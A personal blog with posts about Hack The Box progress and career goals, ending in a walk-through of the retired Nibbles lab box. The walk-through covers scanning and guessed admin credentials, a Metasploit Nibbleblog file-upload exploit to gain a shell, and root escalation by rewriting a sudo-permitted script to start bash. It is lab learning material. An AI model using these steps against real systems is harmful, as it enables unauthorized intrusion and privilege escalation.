Traverxec on HTB!

Yay!  I got another easy active box.  I am learning a lot about certain services and some privilege escalation.  It’s fun.  I am officially a script kiddie on hack the box.  haha

Well, back to work.

Root. On an active HTB. Woot!

Okay, so through working at the box for the most of yesterday and this morning, I friggen got user and root flags for Postman on HTB.  I am not gonna lie, I did reach out for a push or two through the HTB Discord Channel, but no major hints were given, and through a bit of perseverance, I did it. Yay!  Upwards and Onwards!

Anyone who is in this field, wow.  There is so much to learn that I don’t know, and it’s amazing to me to get in the chats and on the web and pour over the articles, cracks, and loopholes that some of the brightest people in this field have come across.  It takes major perseverance and sometimes that quick trip to the bathroom for an ah-ha moment that leads you further down the victory hole.

I have also been listening to another book by Cal Newport – So Good They Can’t Ignore You.  I haven’t gotten too far in the book to quickly start picking up things that resonate with me and give me some clarity on how I need to look a bit more at what I am doing here.  I was always in the mindset of “learning to love what you do rather than following what you love”.  Cal iterated this in the book by basically throwing shade on people who follow their passion.  Simply being that many of us don’t know our passion or think we do, only to ask “is this really what I want out of life?”

I go back to work from Parental leave on Monday.  I haven’t been there for a while.  I want to bring about the “craftsman” mentality to my work – basically, it doesn’t matter what you do, just, as the words of Steve Martin – be so good they can’t ignore you.  I aspire to, every day, work towards this.  I have spent so much of my life caring about what people think.  I also have thought to myself – “I tried the OSCP once, so now I can add it to my resume and people will be lining up to ask me to come to be a pentester for them.”  I am so naive sometimes to myself.

I will stop caring so much about the meetings, the reflection of whether or not I have imposter syndrome, and just focus on the Deep Work of crafting myself into a better me, a more skilled me.  This is my modus operandi.  I will have two bars – one on getting better and more skilled at the policy/risk work I do for the government, and one on working at my technical competency through HTB/PentesterLab.  Then onto VHL, and then circle back to the OSCP, or maybe just get the eJPT.  (Why not?)

All this while adding exercise to my life (running in the AM with Sandy, the family dog, FTW) and being a good father/husband/trance addict.  Yeah, so I think Trance Junkie Podcast will have to wait till the kids are more independent and I can do simple things that don’t align with moving the bar forward for me.

I want to thank God and my wife for helping me find some clarity throughout this week.  Continuing to meditate and practice will help me move myself to where I want to be in a year.  What does that look like?  Well, it’s most likely not an OSCP cert, but it is someone who has moved the bar significantly closer to that cert, someone who is more confident at his job, and someone who continues to be amazed at the existence of his children.

Hack The Box :: Nibbles Walk-through

Priv esc through me for a loop on this one

This is a small win for me. It’s a retired box so there are a lot of walk-throughs on this one already. The user flag wasn’t too hard to get (minus simply guessing the credentials). It was escalating myself to root that took a while. The reason for this is that out of all the walk-throughs, none of the privesc could be replicated. I thought perhaps I could help by showing what I did, and if you somehow cross the web with the same issue, that this might be a crumb for you to push through.

First, I ran nmap on the target. I chose to be verbose on everything as my connection to the web is pretty poor at the moment.

nmap -sC -sV -oA initial -vvv 10.10.10.75
port 80 and 22

Looks like port 80 and 22 are open. So let’s mosey to http://10.10.10.75/.

Looking at the code, I found /nibbleblog/ as a path in the URL

Let’s go there.

So, generally, I would either run a nikto scan or gobuster. Let’s do a gobuster and see if there are any interesting findings.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -u http://10.10.10.75/nibbleblog/ -t 75
…go go gobuster!

Well, http://10.10.10.75/nibbleblog/admin.php looks super interesting.

Here is where there is an enumeration jump. If you go back to the blog, you will see a link for the atom feed: http://10.10.10.75/nibbleblog/feed.php. The title is nibbles. Also, looking at http://10.10.10.75/nibbleblog/content/private/users.xml shows admin as a user. So yah, play with that and you get the following:

Username: admin
Password: nibbles

I started looking for exploits at this point, and it looks like the best one requires metasploit: https://www.exploit-db.com/exploits/38489. So let’s do it.

root@kali:~# msfconsole

------SNIP--------

       =[ metasploit v5.0.58-dev                          ]
+ -- --=[ 1936 exploits - 1082 auxiliary - 333 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 7 evasion                                       ]

msf5 > search nibbleblog

Matching Modules
================

   #  Name                                       Disclosure Date  Rank       Check  Description
   -  ----                                       ---------------  ----       -----  -----------
   0  exploit/multi/http/nibbleblog_file_upload  2015-09-01       excellent  Yes    Nibbleblog File Upload Vulnerability

Let’s use that module.

msf5 > use exploit/multi/http/nibbleblog_file_upload 

Set all the required options:

and send.

damn it feels good to get meterpreter…

drop into shell…

meterpreter > shell
Process 2902 created.
Channel 0 created.
id 
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
pwd
/var/www/html/nibbleblog/content/private/plugins/my_image

Let’s spawn a TTY shell using the following command:

python3 -c "import pty; pty.spawn('/bin/bash')"

Let’s go ahead and get the user.txt flag!

nibbler@Nibbles:/var/www/html/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt
<ml/nibbleblog/content/private/plugins/my_image$ cat /home/nibbler/user.txt

Now, Privesc. This was the hardest thing and took me a while to get it down. But finally, this article did me good, and I was able to work it out. One of the first things is figure out is if you have any files that you can invoke as root. So you do that by calling the command:

sudo -l

so we can run /home/nibbler/personal/stuff/monitor.sh as root. Going into /home/nibbler, you are going to want to unzip personal.zip to get that monitor.sh file. Now we need to modify the monitor.sh file to have the following code:

#!/bin/bash
/bin/bash -i

You can do this by either forwarding it to the end of the text file, or uploading the file using netcat and overwrite it, or get back to meterpreter and upload the file. Make sure you make the file executable (chmod +x monitor.sh)

Then just run the following command:

nibbler@Nibbles:/home/nibbler$ sudo ./monitor.sh
I am root!

And there we go. Now to get the flag…

cat /root/root.txt

I thoroughly enjoyed this box. Please let me know this was helpful to you by DMing me on twitter @Mova. Thanks!